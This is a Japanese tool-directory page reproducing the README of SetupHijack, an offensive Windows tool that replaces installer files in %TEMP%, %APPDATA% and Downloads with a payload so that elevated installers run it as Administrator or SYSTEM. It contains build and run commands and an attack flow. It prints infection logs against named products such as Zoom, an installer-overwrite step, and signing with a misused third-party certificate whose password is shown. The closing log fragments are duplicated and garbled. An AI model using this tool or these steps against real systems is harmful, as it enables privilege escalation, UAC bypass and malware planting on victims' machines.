Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SetupHijack — SetupHijackは、Windowsアプリケーションのインストーラーおよび更新プロセスにおけるレースコンディションと安全でないファイル処理を悪用するセキュリティ調査ツールです。 | Kitploit
ツール/GitHubGitHub/hackerhouse-opensource/setuphijack
特権昇格ペイロード生成エクスプロイト横移動ペネトレーションテストレッドチーミング
GitHubhackerhouse-opensource/setuphijack

SetupHijack

SetupHijackは、Windowsアプリケーションのインストーラーおよび更新プロセスにおけるレースコンディションと安全でないファイル処理を悪用するセキュリティ調査ツールです。

リポジトリを見る
264296ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SetupHijack


概要

SetupHijack は、Windows のインストーラーおよび更新プロセスの競合状態と安全でないファイル処理を悪用するセキュリティ研究ツールです。特権を持つインストーラーやアップデーターが %TEMP% などの誰でも書き込み可能な場所にファイルを配置し、攻撃者がそれらのファイルを昇格した特権で実行される前に置き換えることができるシナリオを対象としています。

  • 実行に昇格された権限を必要としません。
  • ファイルシステムの通知を使用しません(代わりに変更をポーリングします)。
  • Authenticode コード署名とインストーラーの信頼モデルの弱点を悪用します。
  • .exe、.msi、およびバッチファイル(例: sysinfo、netstat、ipconfig)に感染させることができます。
  • レッドチーム、ペネトレーションテスト、およびセキュリティ研究専用に設計されています。

このツールの使用目的は、権限を持つ侵害済みユーザーアカウントでバックグラウンド実行し、インストーラー/アップデーターのファイルドロップをハイジャックして別のプロセスを昇格させることです。

以下のチャートは、UAC バイパスに使用できる複数のシナリオにおける、この悪用の実際の使用例を示しています。UAC バイパスは、Adminless で実行する場合のセキュリティ境界と見なされ、セキュリティ制御を無効化するための一般的な「攻撃者の要件」です。特権を持つ Administrator 操作の悪用は、悪意のあるコードがプロセスの権限をサイドロードまたは昇格させるための汎用的な悪用アクセス手段を提供します。このツールは、同じ種類のリスクにさらされている追加のアプリケーションを特定するために使用できます。攻撃者は、ユーザーの行動を妨げることなく昇格した権限を得る手段として、これらのプロセスの実行を待つことができます。

SetupHijack 脆弱性発見チャート

仕組み

  1. SetupHijack は %TEMP%(およびサブディレクトリ)を継続的にスキャンし、新規または変更されたインストーラーファイルを検出します。
  2. 対象ファイルが検出されると、ユーザーが指定したペイロード(EXE、MSI、または BAT)に置き換えられ、必要に応じて元のファイルは .bak ファイルとして保持されます。
  3. 特権プロセスが整合性チェックの前に置き換えられたファイルを実行すると、ペイロードは昇格した権限(例: SYSTEM または Administrator)で実行されます。
  4. このツールはすべての操作をログに記録し、同じファイルへの再感染を防ぐためのスキップリストを維持します。

コード署名に関する注意

このプロジェクトは、SignToolEx.exe と SignToolExHook.dll を使用したハックされたコード署名プロセスを使用して、ペイロードとインストーラーに署名します。有効なコード署名証明書と Authenticode タイムスタンプを使用すると、インストーラーおよび OS の信頼チェックをバイパスする際の成功率が向上します。


使用方法

ビルド```sh

nmake PAYLOAD=c:\Path\to\your\payload.exe

root@kitploit:~
### 実行 (オプション)```sh
SetupHijack.exe                  # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)
SetupHijack.exe -notemp          # Disable scanning %TEMP%
SetupHijack.exe -noappdata       # Disable scanning %APPDATA%
SetupHijack.exe -nodownloads     # Disable scanning %USERPROFILE%\Downloads
SetupHijack.exe clean            # Clean mode (restores .bak backups in all enabled locations)
SetupHijack.exe verbose          # Verbose mode (log all actions)
SetupHijack.exe <payload.exe>    # Use specified payload for .exe (unless argument is a recognized option)
  • SetupHijack.exe を、特権インストール/更新プロセスの前または最中に実行します。
  • デフォルトでは、このツールは一般的なドロップ場所 ( %TEMP%、%APPDATA%、%USERPROFILE%\Downloads ) をすべてスキャンします。
  • -notemp、-noappdata、-nodownloads フラグを使用して、任意の場所を無効にできます。
  • clean フラグは、有効なすべての場所のバックアップを復元します。verbose フラグはすべての操作をログに記録します。
  • リモート昇格の場合は、ターミナルサービス上で shadow.exe または同様のツールと併用します。

攻撃フローの例

  1. ペイロードと SetupHijack をビルドします: ```sh nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe
    root@kitploit:~
  2. SetupHijack を開始: ```sh SetupHijack.exe
    root@kitploit:~
  3. 対象のインストーラーまたは更新プロセスを管理者として起動します。
  4. インストーラーがファイルを %TEMP% に展開し、昇格した権限で実行する場合、ペイロードが差し替えられて実行されます。

出力例

以下は、コード署名と感染出力を含む、SetupHijack のビルドと実行の実際の例です:``` C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"

Microsoft (R) Program Maintenance Utility Version 14.29.30159.0 Copyright (C) Microsoft Corporation. All rights reserved.

root@kitploit:~
    powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
    cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp

SetupHijack.cpp SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced taskkill /f /im SetupHijack.exe 2>nul powershell -Command "Start-Sleep -Milliseconds 500" link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest copy /y install.wxs.template install.wxs 1 file(s) copied. powershell -Command "(Get-Content install.wxs) -replace 'Source="PAYLOAD_PLACEHOLDER"', 'Source="%ESCAPED_PAYLOAD%"' | Set-Content install.wxs" wix build install.wxs -o install.msi Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe powershell -Command "(Get-Content install.wxs) -replace '(<File Id="RengeExeFile" Source=").*?(" KeyPath="yes"/>)', '%ESCAPED_PAYLOAD%' | Set-Content install.wxs" call sign_random.bat Using CERT: [certs\rockstar1.pfx] Using PASS: [C!EZxYUxVGPzQDj3] The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: SetupHijack.exe

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: install.msi

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0

C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe [2025-09-24 15:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe [2025-09-24 15:20:46] [SetupHijack] If infecting .msi, will use: install.msi [2025-09-24 15:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat: [2025-09-24 15:20:46] - C:\Users\FANTAS1\AppData\Local\Temp [2025-09-24 15:20:46] - C:\Users\Fantastic\AppData\Roaming [2025-09-24 15:20:46] - C:\Users\Fantastic\Downloads [2025-09-24 15:20:46] [SetupHijack] Entering infection loop. [2025-09-24 15:20:59] [SetupHijack] Total infections this session: 0 [2025-09-24 15:21:13] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak [2025-09-24 15:21:13] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak [2025-09-24 15:21:26] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:26] [SetupHijack] Total infections this session: 2 [2025-09-24 15:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak [2025-09-24 15:21:41] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:53] [SetupHijack] Total infections this session: 3

root@kitploit:~
## インプラント展開の使用例

以下は、特権インストーラーの実行中にインプラントを展開するSetupHijackの動作を示すスクリーンショットです:

![インプラントを展開する使用例](https://assets.kitploit.com/production/public/readmes/42886/25e1c4b4b2ca8921509760ae8ddf420a66a13deaed03631c44de618dc668f218.png)

## セキュリティに関する注意事項

- このツールは、許可されたテストおよび研究専用です。
- これらの弱点を悪用すると、ユーザーがAdministratorグループに属している場合、完全なSYSTEM侵害につながる可能性があります。
- インストーラーによっては、この攻撃をブロックするハッシュ/署名チェックを使用する場合がありますが、多くはまだ使用していません。
- 常に管理された環境で使用してください。
- このツールでCVEを発見したり、バウンティを獲得したりした場合は、クレジットを記載してください!

一度に単一のディレクトリ(`%TEMP%`など)をターゲットにすることで、作成時刻/使用時刻(TOCTOU)の競合状態で勝利する可能性が高まります。ポーリングが高速化され、競合が少なくなるためです。最大の信頼性を得るには、それぞれが単一のディレクトリに焦点を当てた複数のSetupHijackインスタンスを実行してください。最適な結果を得るには、ペイロード(昇格させて実行したいEXE)に昇格を要求するマニフェスト(requireAdministrator)を含め、Authenticodeタイムスタンプを含む有効なコードサイニング証明書で署名されていることを確認してください。これにより、インストーラーとOSの信頼チェックをバイパスできる可能性が高まります。

## 特定された脆弱性

以下の網羅的ではないリストは、信頼できない.MSIを実行して「NT AUTHORITY\SYSTEM」になる「ベストケースシナリオ」として特定されていますが、多くの「UAC昇格」
プロセスは.batファイルを介して実行されることがよくあります。実行は同じユーザーSIDの下で行われるため、%TEMP%は%USERPROFILE%
の下で内部セッション作成の一部として構築されるユーザーSIDに固有であり、親プロセスの権利を継承する.batを操作することで、
同一セッション内のコマンドを高整合性の完全な権限に昇格できます。「一時ファイル昇格コマンド実行」は一般的な発見事項であり、UACバイパスや、管理者権限のないユーザーとしての実行に使用できます。
セキュアデスクトップ上のプロンプトが、悪用されたアプリケーション(例:Zoomアップデート)を表示するためです。

- Zoom 6.6.1 (15968) は、.exeのインストールと更新に%AppData%を使用するため、横方向のプロセス移動や
  プロセススプーフィング(例:Zoomアップデートからの昇格要求の送信)が可能になります。実行ファイルは簡単に操作され、
  資格情報窃取攻撃や悪意のある目的に悪用される可能性があります。```
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\airhost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\aomhost64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptControl.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptHost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptInstall.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptService.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomDocConverter.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomHybridConf.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookIMPlugin.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom_launcher.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zTscoder.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zUpdater.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zWebview2Agent.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\uninstall\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\ZoomDownload\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
  • msiexec.exe が install.msi を実行すると、NT AUTHORITY\SYSTEM として実行される

  • Wireshark 更新用 exe は %Temp% 経由で届くが、レースに勝てなかった。

  • Visual Studio の更新時のコード署名チェックは悪用を防ぐ(.VSIX は軽くテスト済み)

  • Texas Instrument Code Composer インストーラーは UAC 認証バイパスに悪用される可能性がある 09/25/2025。 (ccs_setup_20.3.0.00014.exe)``` [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 2 [2025-09-25 14:39:59] [SetupHijack] New infections this run: 5 [2025-09-25 14:40:02] [SetupHijack] Total infections this session: 13 [2025-09-25 14:40:29] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\tmp1758829228.bat.bak [2025-09-25 14:40:29] [SetupHijack] New infections this run: 1

root@kitploit:~
- Cursor IDE は、%TEMP% 内に .bat ファイルとコマンド履歴を作成することが確認されており、Cursor の履歴にコマンドを注入するために
  悪用される可能性があります。権限昇格は制限されます。 

- JBL Quantum Engine には、(現在はパッチ済みの) コマンドインジェクションの脆弱性があり、JBL_QuantumENGINE_1.11.0.1511_x64 が実行される
  ディレクトリと同じディレクトリから "net" (.bat を含む) を実行します。最新バージョンは新しいインストーラーを使用しており、
  この特定のコマンドインジェクションの脆弱性 (JBL_QuantumENGINE_Installer_2.2.13_x64.exe) の影響を受けません。これは
  2022年11月に 0day として発見されました。UAC 制限を回避し、昇格された 
  Administrator 権限を取得するために使用される可能性があります。SYSTEM サービスは、デバッグ/診断のために %TEMP% 配下に bat ファイルを書き込みます。;-)```
C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>type net.bat
@echo off
REM install.bat - runs the payload for SetupHijack
start "" "c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe"

C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>dir JBL_QuantumENGINE_1.11.0.1511_x64.exe
 Volume in drive C has no label.
 Volume Serial Number is 48EC-B703

 Directory of C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day

11/20/2022  11:54 AM       139,327,096 JBL_QuantumENGINE_1.11.0.1511_x64.exe
               1 File(s)    139,327,096 bytes
               0 Dir(s)  237,500,821,504 bytes free
  • EA Sports「EA Anti-Cheat Installer」任意の高権限コマンド実行。 「skate.」などのEAタイトルは、一時的かつユーザー書き込み可能な場所を使用するアンチチートサービスをインストールします。 攻撃者はSTEAMインストール中にEAAntiCheat.Installer.exeを置き換えることができ、 UAC昇格プロンプトはSTEAMエンジンからValveのロゴとアイコンとともに表示されますが、 ペイロードのexeを高権限で実行します。 UACバイパス(混乱?)攻撃での使用については、EASkateUACのスクリーンショットを参照してください。``` Directory of C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat

09/29/2025 04:34 PM

. 09/29/2025 04:13 PM .. 09/29/2025 04:31 PM 166,999,232 EAAntiCheat.Installer.exe 1 File(s) 166,999,232 bytes 2 Dir(s) 161,991,856,128 bytes free

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>cacls EAAntiCheat.Installer.exe C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat\EAAntiCheat.Installer.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F WIN11LAB\Fantastic:(ID)F APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>copy c:\Users\Fantastic\Documents\Work\EA\launch_demo.exe EAAntiCheat.Installer.exe Overwrite EAAntiCheat.Installer.exe? (Yes/No/All): A 1 file(s) copied.

root@kitploit:~
# ライセンス

これらのファイルは3条項BSDライセンスの下で利用可能です。
ツールをダウンロード
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\tmp1758829228.bat with payload install.bat, backup: C:\Users\FANTAS